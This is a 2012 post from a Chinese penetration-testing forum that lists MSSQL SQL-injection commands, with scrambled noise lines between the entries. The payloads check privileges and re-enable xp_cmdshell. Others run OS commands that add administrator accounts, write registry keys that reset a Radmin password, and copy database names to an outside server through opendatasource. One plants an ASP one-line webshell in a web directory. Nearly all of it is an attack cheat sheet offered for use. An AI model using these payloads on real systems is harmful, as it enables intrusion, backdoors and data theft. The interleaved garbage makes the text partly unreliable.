中国网络渗透测试联盟
标题:
常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-15 14:40
标题:
常用的一些注入命令
//看看是什么权限的
2 Q5 n3 Q& f# b6 O& s1 t) w
and 1=(Select IS_MEMBER('db_owner'))
* i+ r5 v$ q/ @3 D+ w
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
# B. Y/ E/ c- k0 ]) a9 Z- @. \# G
) V8 \4 y8 G2 T4 ?; l9 X2 A7 m
//检测是否有读取某数据库的权限
2 g6 h: g5 E+ f1 `& V3 T3 N' X
and 1= (Select HAS_DBACCESS('master'))
, m* b* ?' U& I1 m$ _5 `
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
2 g8 q2 D5 P2 `7 y
, ^, Q) U$ ]. z6 c" v
* q7 w7 Y5 z4 d* ]
数字类型
" _' d$ b* B1 h3 X
and char(124)%2Buser%2Bchar(124)=0
1 Y6 p) o5 J- V# H4 N
" ?( T/ [$ w2 T- z0 {3 ]7 M* g
字符类型
) G$ _: i/ F/ c% Q, v8 v
' and char(124)%2Buser%2Bchar(124)=0 and ''='
6 E7 A4 z, [3 {6 v( E+ ?
! X3 X" G5 l2 O: @5 H
搜索类型
! e. V& E* F$ _
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
Z* J0 b C* U
% m3 I, |2 E8 P% I
爆用户名
8 N) \0 T. ]5 Z) }
and user>0
}3 J/ g9 x- B1 }4 o$ B/ v; c
' and user>0 and ''='
# A3 q! }% s: v
; e, ], W7 ^9 Q1 g2 D
检测是否为SA权限
% w: i f8 e: U1 \6 G
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 s4 J* C) R( M6 W7 _
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
5 p; d! H7 B$ A3 H# ^
1 J( H+ @1 u5 M5 K3 K/ a
检测是不是MSSQL数据库
# I& E, g% h; g0 X! O. z- p! |
and exists (select * from sysobjects);--
* M0 ^6 Y: f" U7 d. w
- ]. o- k: W; {2 f, J# Q; o
检测是否支持多行
% v. I" Y9 t2 _; U$ e. l
;declare @d int;--
4 k$ z- s( B# d, x# V
2 P c1 ?# W4 K" k
恢复 xp_cmdshell
" E( ~0 D! ^: y, C g- [
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 ~3 |& H3 k9 X2 H
* ]' K/ h. ]! o& T' [3 W
( M) i5 H% g# L8 K8 w1 \1 @
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
+ v1 i+ {% R, x5 L( `
& c4 ~4 W9 M$ X* _
//-----------------------
7 d- F' ?0 Q) a; w' H. O4 K" O
// 执行命令
# _! R' `7 w; I& l0 C2 X
//-----------------------
4 e$ K# s6 b% r
首先开启沙盘模式:
* \( x* B c* T1 W |
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) p* }7 @4 K5 b5 |- k
) j. [" {' f, H K
然后利用jet.oledb执行系统命令
$ ]* `- q, t" q
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
$ {5 h$ S! V5 A
2 m" h9 B$ ~, t% m6 C2 X
执行命令
9 m2 M( I' T" O" V# X
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
% }5 d3 z* x, @; K
6 C; Q; x, G i. {0 W. {0 z
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
9 t. h. v6 L) c4 |
- b2 ^$ v3 s3 Q2 u( @+ T- r2 o n
判断xp_cmdshell扩展存储过程是否存在:
% K+ Y6 L) v7 ~2 R+ d- h5 V5 b7 c
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
$ W8 e5 Q2 O; C9 m4 n+ u
1 n& R: d, ?- P( q/ c
写注册表
- M- G! V5 y* W8 p9 s3 k
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& Y4 Q" t# B5 C2 `# M8 o
6 H' S% q/ N, h* @
REG_SZ
, x9 C/ _8 F. D
! I. \+ n/ w7 r7 Q
读注册表
\" c- K. W( I3 G8 @; E X4 e
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
" y. x( R" v: F% }% m" J8 X
! D7 }# p; H& M- a R% g
读取目录内容
9 U/ K; I9 L$ C6 B/ Y
exec master..xp_dirtree 'c:\winnt\system32\',1,1
) _ Q7 T2 n4 A% x# v
{4 A- H2 f0 x: }
; V, {7 o, `6 v
数据库备份
. ]! {5 I Y" A7 L' ~6 @
backup database pubs to disk = 'c:\123.bak'
' c$ D: A! P6 o. t
/ y. [8 U' o1 U+ h! z; y6 M; v
//爆出长度
3 O6 Q% k6 X9 _& t4 o: a3 M
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
. [1 F( e! z1 _/ [
* s0 Z* b! M- C. g: d5 Z& T# m: Y1 g
2 L; B8 U8 m w% ^$ o
+ A W) n( {/ {0 b* t+ v
更改sa口令方法:用sql综合利用工具连接后,执行命令:
! l; y2 N# _ c; c
exec sp_password NULL,'新密码','sa'
, v) W5 _& _, y4 I* y$ v5 f
& O5 S: n6 W, [, G" R7 Y
添加和删除一个SA权限的用户test:
" H. n3 ? T0 C( |
exec master.dbo.sp_addlogin test,9530772
% @; }4 s& S, ?+ j5 H
exec master.dbo.sp_addsrvrolemember test,sysadmin
6 @& } h# B* V2 M: X6 ]
3 U" S' r! y5 Q2 n" P [
删除扩展存储过过程xp_cmdshell的语句:
9 W J) e% |, F, ?) R- F
exec sp_dropextendedproc 'xp_cmdshell'
! v7 U7 [/ @7 @' f( I/ }& h
: }+ D5 x- U4 ]. X8 M3 B
添加扩展存储过过程
# y1 |( k0 m7 R" _, t
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
/ m+ T& |. A& P5 E
GRANT exec On xp_proxiedadata TO public
$ Z: v: s5 ^. a1 E: U
- B0 y7 r% A9 k3 A0 `
6 n* @3 Q s) M4 v+ K* f) D" |
停掉或激活某个服务。
2 d8 J0 c; n8 X
7 q& l l, ~8 B: e: E
exec master..xp_servicecontrol 'stop','schedule'
- J- h. t( w) t4 i; n7 ^
exec master..xp_servicecontrol 'start','schedule'
6 X& u0 }$ N8 L3 }, {
+ j! I6 J6 U* W
dbo.xp_subdirs
( g( o* ?4 C. x. w% J! ~- V
& h' Z6 v! X" w& H- i7 A
只列某个目录下的子目录。
/ u' |5 K6 R7 X ~
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
$ A5 _ m! i4 O" H" T
9 J7 h; H5 U$ @- p0 q7 \
dbo.xp_makecab
1 \- |5 J V2 i+ q) T! a
. ?" `: m) o1 G" D- A
将目标多个档案压缩到某个目标档案之内。
. D% c u( ~+ l3 {; k$ Z
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! x5 I p. [) ~; {+ r+ Y
- H! i% N: K J' f, m* y. r2 j
dbo.xp_makecab
$ x( u5 }. D9 o
'c:\test.cab','mszip',1,
2 U* K3 l: n0 w* P! g$ P
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* _+ X+ D+ a' r& b, L' W ^
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
2 h- w* a n8 X8 `
3 W: x7 Z$ J7 ~$ p. m
xp_terminate_process
$ o7 @% P" H& n
9 w. D, Z( [2 O+ l9 X8 T6 ^
停掉某个执行中的程序,但赋予的参数是 Process ID。
) O4 Y( d! T; I1 t" {9 h) z: w
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. K) T, |; U7 Q2 f: C9 H5 i# q$ s
4 D3 C5 e3 s5 J {, h1 F$ b/ G
xp_terminate_process 2484
# E( P2 N- z, s4 i6 o
( y+ _, V1 W0 G Q
xp_unpackcab
, a( u6 d; c6 f0 Q
) V* d! J4 o. T9 Y# N
解开压缩档。
, ?. M4 e* T( [3 d5 W
. ~' `$ l {# Y
xp_unpackcab 'c:\test.cab','c:\temp',1
2 d4 O' `9 V* {. H' V {
' v' p4 _- f/ K" J* x. J
0 l1 a& i( G+ f1 ~, z& e
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
/ j# b5 O( P3 a: l2 w
`" u6 |. t- J5 S& s5 ?4 v$ O
create database lcx;
6 D- T* x0 F, A" n" K5 M& S3 y
Create TABLE ku(name nvarchar(256) null);
( f, O% ^$ C- y; h9 ^/ g8 ?4 I9 u
Create TABLE biao(id int NULL,name nvarchar(256) null);
* n# H* G" N) L7 D' H
# q: |( O5 x! w. {
//得到数据库名
# r$ y: F# ?. J# D# ?, g1 |
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
( }- F8 m! V$ P: s9 G) {# P
$ m$ H( D: a. C0 `5 d7 P
: c: N# o! L4 r! I
//在Master中创建表,看看权限怎样
# t/ z0 M. n" y7 n2 ~* T/ b
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
' X D+ G: D& ^3 L Q
+ F; B3 k/ U( ^- g8 a$ {; _& t
用 sp_makewebtask直接在web目录里写入一句话马:
* Q1 }4 A1 t8 l: [
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 s3 a7 _6 L* Q. ^- C
. M/ J8 E) j1 r% W/ v) X
//更新表内容
( R; k) E- w; }1 m5 h7 t
Update films SET kind = 'Dramatic' Where id = 123
) v$ |) G5 U9 d& B3 q# d
7 t+ A2 k4 P% F
//删除内容
9 r- T7 p5 f% i) D) J& V
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2